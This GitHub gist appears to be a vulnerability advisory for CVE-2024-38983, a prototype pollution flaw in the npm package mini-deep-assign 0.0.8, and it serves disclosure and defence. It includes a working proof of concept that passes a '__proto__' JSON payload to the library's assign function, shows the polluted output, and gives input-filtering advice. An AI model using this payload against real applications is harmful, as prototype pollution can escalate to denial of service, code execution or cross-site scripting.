Skip to content

Instantly share code, notes, and snippets.

@mestrtee

mestrtee/mini-deep-assign-pp.md

Last active July 29, 2024 17:47
Show Gist options
  • Save mestrtee/f82d0c3a8fe3a125f06425caef5d22ed to your computer and use it in GitHub Desktop.
Save mestrtee/f82d0c3a8fe3a125f06425caef5d22ed to your computer and use it in GitHub Desktop.
Download ZIP
[CVE-2024-38983] Prototype Pollution Vulnerability Affecting mini-deep-assign, version 0.0.8
Raw
mini-deep-assign-pp.md

Overview

All versions of this module are potentially affected by prototype pollution. The vulnerability located at Module.assign (/lib/index.js:91). when _assign() method used to recursively copy source property to the destination. An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__ or constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

PoC

(async () => {
  const lib = await import('mini-deep-assign');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

No updates were provided by the maintainer. Users of this module are urged to implement proper santization and validation over user's supplied inputs, such as blocking inputs containing __proto__ and contructor.prototype

References:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment